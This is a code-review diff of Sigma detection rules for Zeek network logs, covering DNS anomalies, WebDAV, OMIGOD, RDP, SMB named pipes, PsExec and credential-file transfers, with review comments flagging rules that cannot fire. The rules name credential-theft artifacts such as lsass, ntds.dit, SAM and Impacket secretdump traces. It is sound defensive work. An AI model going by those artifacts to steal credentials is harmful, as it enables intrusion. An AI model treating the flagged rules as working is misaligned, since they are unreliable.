@@ -1,71 +1,56 @@ title: Suspicious DNS Z Flag Bit Set id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5 -description: 'The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs' -status: experimental -date: 2021/05/04 -modified: 2022/02/24 +status: test +description: | + The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). + Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. + Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. + Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. 
+ This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs' references: - - 'https://twitter.com/neu5ron/status/1346245602502443009' - - 'https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma' - - 'https://tools.ietf.org/html/rfc2929#section-2.1' - - 'https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS' + - https://twitter.com/neu5ron/status/1346245602502443009 + - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma + - https://tools.ietf.org/html/rfc2929#section-2.1 + - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS author: '@neu5ron, SOC Prime Team, Corelight' +date: 2021/05/04 +modified: 2022/11/29 tags: - - attack.t1095 - - attack.t1571 - - attack.command_and_control + - attack.t1095 + - attack.t1571 + - attack.command_and_control logsource: - product: zeek - service: dns + product: zeek + service: dns detection: - z_flag_unset: - Z: '0' - most_probable_valid_domain: - query|contains: '.' - exclude_tlds: - query|endswith: - - '.arpa' - - '.local' - - '.ultradns.net' - - '.twtrdns.net' - - '.azuredns-prd.info' - - '.azure-dns.com' - - '.azuredns-ff.info' - - '.azuredns-ff.org' - - '.azuregov-dns.org' - exclude_query_types: - qtype_name: - - 'NS' - - 'ns' - - 'MX' - - 'mx' - exclude_responses: - answers|endswith: '\\x00' - exclude_netbios: - id.resp_p: - - '137' - - '138' - - '139' - condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) + z_flag_unset: + Z: 0 + most_probable_valid_domain: + query|contains: '.' 
+ exclude_tlds: + query|endswith: + - '.arpa' + - '.local' + - '.ultradns.net' + - '.twtrdns.net' + - '.azuredns-prd.info' + - '.azure-dns.com' + - '.azuredns-ff.info' + - '.azuredns-ff.org' + - '.azuregov-dns.org' + exclude_query_types: + qtype_name: + - 'ns' + - 'mx' + exclude_responses: + answers|endswith: '\\x00' + exclude_netbios: + id.resp_p: + - 137 + - 138 + - 139 + condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) falsepositives: - - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' - - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' + - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' + - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' level: medium -fields: - - ts - - id.orig_h - - id.orig_p - - id.resp_h - - id.resp_p - - proto - - qtype_name - - qtype - - query - - answers - - rcode - - rcode_name - - trans_id - - qtype - - ttl - - AA - - uid diff --git a/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml b/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml index a227bb586..82e7d3aba 100644 --- a/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml 
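Review bot: The new block-scalar description ends with a stray single quote — `...threat-hunting-with-zeek-bro-logs'` — left over from the old quoted string, so the rendered text now carries a trailing `'`; drop it. The same paragraph still contains the sentence about "multiple of these files were accessed", which reads like copy-paste from a file-access rule and does not apply to a DNS header flag; it is worth removing while the text is being rewritten. Reducing `exclude_query_types` from `NS`/`ns`/`MX`/`mx` to just `ns`/`mx` is only safe if the backend matches case-insensitively — Zeek writes `qtype_name` in upper case — so if this plugin's conversion yields a case-sensitive keyword match the exclusion silently stops working and every NS/MX query with Z set will alert; confirm before relying on it.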
@@ -1,17 +1,18 @@ title: DNS TOR Proxies id: a8322756-015c-42e7-afb1-436e85ed3ff5 +status: test description: Identifies IPs performing DNS lookups associated with common Tor proxies. -status: experimental references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_TorProxies.yaml -date: 2021/08/15 + - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml author: Saw Winn Naung , Azure-Sentinel -level: medium +date: 2021/08/15 +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1048 logsource: service: dns product: zeek -tags: - - attack.t1048 detection: selection: query: @@ -50,3 +51,6 @@ detection: condition: selection fields: - clientip +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml b/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml index cb04ce559..40639e815 100644 --- a/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml +++ b/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml 
@@ -2,26 +2,26 @@ title: Executable from Webdav id: aac2fd97-bcba-491b-ad66-a6edf89c71bf status: test description: 'Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/' -author: 'SOC Prime, Adam Swan' references: - - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html - - https://github.com/OTRF/detection-hackathon-apt29 + - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html + - https://github.com/OTRF/detection-hackathon-apt29 +author: 'SOC Prime, Adam Swan' date: 2020/05/01 modified: 2021/11/27 +tags: + - attack.command_and_control + - attack.t1105 logsource: - product: zeek - service: http + product: zeek + service: http detection: - selection_webdav: - - c-useragent|contains: 'WebDAV' - - c-uri|contains: 'webdav' - selection_executable: - - resp_mime_types|contains: 'dosexec' - - c-uri|endswith: '.exe' - condition: selection_webdav and selection_executable + selection_webdav: + - c-useragent|contains: 'WebDAV' + - c-uri|contains: 'webdav' + selection_executable: + - resp_mime_types|contains: 'dosexec' + - c-uri|endswith: '.exe' + condition: selection_webdav and selection_executable falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.command_and_control - - attack.t1105 diff --git a/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml b/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml index f8f5fc693..58a2c26ec 100644 --- a/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml +++ b/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml 
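Review bot: The reindented selection still keys on `c-useragent` and `c-uri`, which are not fields of Zeek's http.log; the sibling zeek_http_webdav_put_request rule in this same patch uses `user_agent`, and Zeek names the request path `uri`. Unless this plugin's Zeek field mapping aliases those names, `selection_webdav` can never match and the rule is dead; I would change the keys to `user_agent|contains: 'WebDAV'`, `uri|contains: 'webdav'` and `uri|endswith: '.exe'`. `resp_mime_types` is a genuine http.log field, so that half of `selection_executable` is fine as is.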
@@ -1,12 +1,16 @@ title: OMIGOD HTTP No Authentication RCE id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b -description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. -author: Nate Guagenti (neu5ron) -date: 2021/09/20 -modified: 2019/09/20 +status: stable +description: | + Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. + Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). + Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. references: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://twitter.com/neu5ron/status/1438987292971053057?s=20 +author: Nate Guagenti (neu5ron) +date: 2021/09/20 +modified: 2019/09/20 tags: - attack.privilege_escalation - attack.initial_access 
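Review bot: The metadata now has `modified: 2019/09/20` directly under `date: 2021/09/20`, i.e. a modification date two years before the rule was created and before CVE-2021-38647 was published; the value was carried over from the removed lines rather than corrected. It is almost certainly a typo for 2021, so set `modified: 2021/09/20` (or today's date, since the description and references are being edited here). Anything sorting or auditing rules by modification date will otherwise misplace this one.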
@@ -20,7 +24,7 @@ tags: logsource: product: zeek service: http - definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/master/scripts/policy/protocols/http/header-names.zeek + definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/d957f883df242ef159cfd846884e673addeea7a5/scripts/policy/protocols/http/header-names.zeek detection: selection: status_code: 200 @@ -30,17 +34,13 @@ detection: client_header_names|contains: 'AUTHORIZATION' too_small_http_client_body: request_body_len: 0 - #winrm_ports: + # winrm_ports: # id.resp_p: # - 5985 # - 5986 # - 1270 condition: selection and not auth_header and not too_small_http_client_body - #condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule -falsepositives: - - Exploits that were attempted but unsuccessful. - - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips. -level: high + # condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule fields: - id.orig_h - id.resp_h 
@@ -51,4 +51,7 @@ fields: - request_body_len - response_body_len - user_agent -status: stable +falsepositives: + - Exploits that were attempted but unsuccessful. + - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips. +level: high diff --git a/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml b/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml index ed3a28834..046a39c1d 100644 --- a/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml +++ b/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml 
@@ -2,27 +2,29 @@ title: WebDav Put Request id: 705072a5-bb6f-4ced-95b6-ecfa6602090b status: test description: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/17 + - https://github.com/OTRF/detection-hackathon-apt29/issues/17 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2020/05/02 -modified: 2021/11/27 +modified: 2024/03/13 +tags: + - attack.exfiltration + - attack.t1048.003 logsource: - product: zeek - service: http + product: zeek + service: http detection: - selection: - user_agent|contains: 'WebDAV' - method: 'PUT' - filter: - id.resp_h: - - 192.168.0.0/16 - - 172.16.0.0/12 - - 10.0.0.0/8 - condition: selection and not filter + selection: + user_agent|contains: 'WebDAV' + method: 'PUT' + filter: + id.resp_h|cidr: + - 10.0.0.0/8 + - 127.0.0.0/8 + - 172.16.0.0/12 + - 192.168.0.0/16 + - 169.254.0.0/16 + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: low -tags: - - attack.exfiltration - - attack.t1048.003 diff --git a/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml b/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml index 8674e33f3..f48740e2c 100644 --- a/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml +++ b/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml 
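Review bot: Switching the filter to `id.resp_h|cidr` makes the private-range exclusion actually work (plain equality against `192.168.0.0/16` could never match an address), but the new list is IPv4-only: a WebDAV PUT to an internal IPv6 host (ULA `fc00::/7`, link-local `fe80::/10`, `::1`) is not filtered and will be reported as exfiltration. Consider adding `- fc00::/7`, `- fe80::/10` and `- ::1/128` under the same `id.resp_h|cidr` list, assuming the backend's `cidr` modifier evaluates IPv6 prefixes. The sibling zeek_rdp_public_listener rule in this patch uses the identical five-entry list, so whichever way this is decided should be applied to both.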
@@ -1,47 +1,31 @@ title: Publicly Accessible RDP Service id: 1fc0809e-06bf-4de3-ad52-25e5263b7623 -status: experimental -description: Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service. +status: test +description: | + Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service. references: - https://attack.mitre.org/techniques/T1021/001/ +author: Josh Brower @DefensiveDepth +date: 2020/08/22 +modified: 2024/03/13 tags: + - attack.lateral_movement - attack.t1021.001 -author: 'Josh Brower @DefensiveDepth' -date: 2020/08/22 -modified: 2021/11/14 logsource: product: zeek service: rdp detection: selection: - id.orig_h|startswith: - - '192.168.' - - '10.' - - '172.16.' - - '172.17.' - - '172.18.' - - '172.19.' - - '172.20.' - - '172.21.' - - '172.22.' - - '172.23.' - - '172.24.' - - '172.25.' - - '172.26.' - - '172.27.' - - '172.28.' - - '172.29.' - - '172.30.' - - '172.31.' - - 'fd' - - '2620:83:800f' - #approved_rdp: - #dst_ip: - #- x.x.x.x - condition: not selection #and not approved_rdp -fields: - - id.orig_h - - id.resp_h + id.orig_h|cidr: + - 10.0.0.0/8 + - 127.0.0.0/8 + - 172.16.0.0/12 + - 192.168.0.0/16 + - 169.254.0.0/16 + # approved_rdp: + # dst_ip: + # - x.x.x.x + condition: not selection # and not approved_rdp falsepositives: - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. level: high diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml index e0e7ef851..67139a7f6 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml 
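Review bot: The rewritten `selection` drops the IPv6 coverage the old rule had — the removed `startswith` list included `'fd'` (ULA space) and an explicit IPv6 prefix, while the new `id.orig_h|cidr` list is IPv4-only — so RDP connections from internal IPv6 clients are now reported as a publicly accessible listener. Adding `- fc00::/7`, `- fe80::/10` and `- ::1/128` restores that, provided the backend's `cidr` modifier handles IPv6 prefixes. The commented `approved_rdp` block still references `dst_ip`, which is not a Zeek rdp.log field (the removed `fields` list shows `id.resp_h`), so it will not work if someone uncomments it. Minor: the description now reads `...RDP listener. Which is indicative...`, a sentence fragment split from the old single sentence.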
+++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml @@ -1,27 +1,30 @@ title: Remote Task Creation via ATSVC Named Pipe - Zeek id: dde85b37-40cd-4a94-b00c-0b8794f956b5 +related: + - id: f6de6525-4509-495a-8a82-1f8b0ed73a00 + type: derived status: test description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe -author: 'Samir Bousseaden, @neu5rn' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml + - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html +author: 'Samir Bousseaden, @neu5rn' date: 2020/04/03 -modified: 2021/11/27 +modified: 2022/12/27 +tags: + - attack.lateral_movement + - attack.persistence + - car.2013-05-004 + - car.2015-04-001 + - attack.t1053.002 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - path: \\\*\IPC$ - name: atsvc - #Accesses: '*WriteData*' - condition: selection + selection: + path: '\\\*\IPC$' + name: 'atsvc' + # Accesses: '*WriteData*' + condition: selection falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.lateral_movement - - attack.persistence - - car.2013-05-004 - - car.2015-04-001 - - attack.t1053.002 diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml index da432c695..2d9b24e4e 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml 
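Review bot: The now-quoted `path: '\\\*\IPC$'` is the Windows event 5145 share name carried over from the original win_atsvc_task rule; under Sigma escaping `\*` is a literal asterisk, so this is an exact match on a path containing `*\IPC$`. Zeek's smb_files.log records the real share path, e.g. `\\10.0.0.5\IPC$` or `\\HOST\IPC$`, so unless the converter used here treats `\*` as a wildcard the selection never matches and the rule is silent. The other converted rules in this patch already use a suffix or substring match — `path|endswith: 'IPC$'` in the spoolss rule, `path|contains|all` in the psexec rule — and `path|endswith: '\IPC$'` would be the consistent fix; `name: 'atsvc'` is fine as is.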
@@ -2,27 +2,27 @@ title: Possible Impacket SecretDump Remote Activity - Zeek id: 92dae1ed-1c9d-4eff-a567-33acbd95b00e status: test description: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml' -author: 'Samir Bousseaden, @neu5ron' references: - - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html + - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html +author: 'Samir Bousseaden, @neu5ron' date: 2020/03/19 modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.003 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - path|contains|all: - - '\' - - 'ADMIN$' - name|contains: 'SYSTEM32\' - name|endswith: '.tmp' - condition: selection + selection: + path|contains|all: + - '\' + - 'ADMIN$' + name|contains: 'SYSTEM32\' + name|endswith: '.tmp' + condition: selection falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.credential_access - - attack.t1003.002 - - attack.t1003.004 - - attack.t1003.003 diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml index 68c8c83f0..4f4173fc2 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml 
@@ -1,42 +1,42 @@ title: First Time Seen Remote Named Pipe - Zeek id: 021310d9-30a6-480a-84b7-eaa69aeb92bb +related: + - id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad + type: derived status: test description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes -author: 'Samir Bousseaden, @neu5ron' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml + - https://twitter.com/menasec1/status/1104489274387451904 +author: Samir Bousseaden, @neu5ron, Tim Shelton date: 2020/04/02 -modified: 2021/11/27 +modified: 2022/12/27 +tags: + - attack.lateral_movement + - attack.t1021.002 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection1: - path: \\\*\IPC$ - selection2: - path: \\\*\IPC$ - name: - - 'atsvc' - - 'samr' - - 'lsarpc' - - 'winreg' - - 'netlogon' - - 'srvsvc' - - 'protected_storage' - - 'wkssvc' - - 'browser' - - 'netdfs' - - 'svcctl' - - 'spoolss' - - 'ntsvcs' - - 'LSM_API_service' - - 'HydraLsPipe' - - 'TermSrv_API_service' - - 'MsFteWds' - condition: selection1 and not selection2 + selection: + path: '\\\\\*\\IPC$' # Looking for the string \\*\IPC$ + filter_keywords: + - 'samr' + - 'lsarpc' + - 'winreg' + - 'netlogon' + - 'srvsvc' + - 'protected_storage' + - 'wkssvc' + - 'browser' + - 'netdfs' + - 'svcctl' + - 'spoolss' + - 'ntsvcs' + - 'LSM_API_service' + - 'HydraLsPipe' + - 'TermSrv_API_service' + - 'MsFteWds' + condition: selection and not 1 of filter_* falsepositives: - - Update the excluded named pipe to filter out any newly observed legit named pipe + - Update the excluded named pipe to filter out any newly observed legit named pipe level: high -tags: - - attack.lateral_movement - - attack.t1021.002 
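Review bot: The new `path: '\\\\\*\\IPC$'` with its comment `Looking for the string \\*\IPC$` deliberately targets the literal-asterisk share name from Windows event 5145, but Zeek's smb_files.log carries the actual server in the path (`\\HOST\IPC$`, `\\10.0.0.5\IPC$`), so this exact match should never fire on Zeek data; `path|endswith: '\IPC$'` as in the spoolss rule would match what Zeek logs. Second, `filter_keywords` is an unkeyed list, which Sigma treats as a free-text keyword search across all fields rather than a match on the pipe name, so an event whose `path`, `uid` or any other field happens to contain `browser` or `samr` is excluded while the intended "known pipe names" semantics are lost; it should be keyed, e.g. `filter_name:` / `name:` / the list, so that `not 1 of filter_*` keeps its meaning. Note also that `atsvc` was dropped from the exclusion list, which is reasonable if the dedicated atsvc rule and this one are meant to both fire, but it is a behaviour change the commit does not call out.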
diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml index bfa5b20b1..6cc11eafb 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml @@ -1,33 +1,33 @@ title: Suspicious PsExec Execution - Zeek id: f1b3a22a-45e6-4004-afb5-4291f9c21166 +related: + - id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 + type: derived status: test description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one -author: 'Samir Bousseaden, @neu5ron' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml + - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html +author: Samir Bousseaden, @neu5ron, Tim Shelton date: 2020/04/02 -modified: 2021/11/27 +modified: 2022/12/27 +tags: + - attack.lateral_movement + - attack.t1021.002 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection1: - path|contains|all: - - '\\' - - '\IPC$' - name|endswith: - - '-stdin' - - '-stdout' - - '-stderr' - selection2: - name|contains|all: - - '\\' - - '\IPC$' - path|startswith: 'PSEXESVC' - condition: selection1 and not selection2 + selection: + path|contains|all: + - '\\' + - '\IPC$' + name|endswith: + - '-stdin' + - '-stdout' + - '-stderr' + filter: + name|startswith: 'PSEXESVC' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.lateral_movement - - attack.t1021.002 
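Review bot: The new `filter: name|startswith: 'PSEXESVC'` fixes the old selection2, which tested `path` for the service name and `name` for the share and so never excluded anything, but the filter only covers the Sysinternals default. The description says the rule targets "psexec or paexec with renamed service name", yet PAExec's stock pipe names (which, as far as I know, begin with `PAExec-`) are not filtered, so every default PAExec run will alert at `level: high`; either state that in the description or add `- 'PAExec-'` alongside `'PSEXESVC'` (turning the `name|startswith` value into a list).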
diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml index ff4e1bdb2..63b863352 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml @@ -1,39 +1,37 @@ title: Suspicious Access to Sensitive File Extensions - Zeek id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc +related: + - id: 91c945bc-2ad1-4799-a591-4d00198a1215 + type: derived status: test description: Detects known sensitive file extensions via Zeek -author: 'Samir Bousseaden, @neu5ron' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml + - Internal Research +author: Samir Bousseaden, @neu5ron date: 2020/04/02 modified: 2021/11/27 +tags: + - attack.collection logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - name|endswith: - - '.pst' - - '.ost' - - '.msg' - - '.nst' - - '.oab' - - '.edb' - - '.nsf' - - '.bak' - - '.dmp' - - '.kirbi' - - '\groups.xml' - - '.rdp' - condition: selection -fields: - - ComputerName - - SubjectDomainName - - SubjectUserName - - RelativeTargetName + selection: + name|endswith: + - '.pst' + - '.ost' + - '.msg' + - '.nst' + - '.oab' + - '.edb' + - '.nsf' + - '.bak' + - '.dmp' + - '.kirbi' + - '\groups.xml' + - '.rdp' + condition: selection falsepositives: - - Help Desk operator doing backup or re-imaging end user machine or backup software - - Users working with these data types or exchanging message files + - Help Desk operator doing backup or re-imaging end user machine or backup software + - Users working with these data types or exchanging message files level: medium -tags: - - attack.collection 
diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml index ed9fc8db2..80e974747 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml 
@@ -1,32 +1,35 @@ title: Transferring Files with Credential Data via Network Shares - Zeek id: 2e69f167-47b5-4ae7-a390-47764529eff5 +related: + - id: 910ab938-668b-401b-b08c-b596e80fdca5 + type: similar status: test description: Transferring files with well-known filenames (sensitive files with credential data) using network shares -author: '@neu5ron, Teymur Kheirkhabarov, oscd.community' references: - - https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml + - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment +author: '@neu5ron, Teymur Kheirkhabarov, oscd.community' date: 2020/04/02 modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1003.002 + - attack.t1003.001 + - attack.t1003.003 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - name: - - '\mimidrv' - - '\lsass' - - '\windows\minidump\' - - '\hiberfil' - - '\sqldmpr' - - '\sam' - - '\ntds.dit' - - '\security' - condition: selection + selection: + name: + - '\mimidrv' + - '\lsass' + - '\windows\minidump\' + - '\hiberfil' + - '\sqldmpr' + - '\sam' + - '\ntds.dit' + - '\security' + condition: selection falsepositives: - - Transferring sensitive files for legitimate administration work by legitimate administrator + - Transferring sensitive files for legitimate administration work by legitimate administrator level: medium -tags: - - attack.credential_access - - attack.t1003.002 - - attack.t1003.001 - - attack.t1003.003 diff --git a/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml b/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml index d71b2ec56..5cc7d95f8 100644 --- a/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml +++ b/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml 
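Review bot: The reindented `selection` still uses plain `name:` with values such as `'\lsass'`, `'\windows\minidump\'` and `'\sam'`, which in Sigma is an exact full-value match; Zeek's smb_files.log `name` holds the file name or relative path (`lsass.dmp`, `folder\ntds.dit`), so none of these values can equal a real name and the rule cannot fire unless this plugin's converter turns bare values into substring matches. The Windows rule this was converted from used, as I recall, a `contains` modifier on the target name; `name|contains:` with the same list restores that intent, and the leading-backslash entries then also match names carrying a directory prefix.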
@@ -2,24 +2,24 @@ title: Kerberos Network Traffic RC4 Ticket Encryption id: 503fe26e-b5f2-4944-a126-eab405cc06e5 status: test description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting -author: sigma references: - - https://adsecurity.org/?p=3458 + - https://adsecurity.org/?p=3458 +author: sigma date: 2020/02/12 modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1558.003 logsource: - product: zeek - service: kerberos + product: zeek + service: kerberos detection: - selection: - request_type: 'TGS' - cipher: 'rc4-hmac' - computer_acct: - service|startswith: '$' - condition: selection and not computer_acct + selection: + request_type: 'TGS' + cipher: 'rc4-hmac' + computer_acct: + service|startswith: '$' + condition: selection and not computer_acct falsepositives: - - Normal enterprise SPN requests activity + - Normal enterprise SPN requests activity level: medium -tags: - - attack.credential_access - - attack.t1558.003 diff --git a/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java b/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java index e32f19371..0eb398475 100644 --- 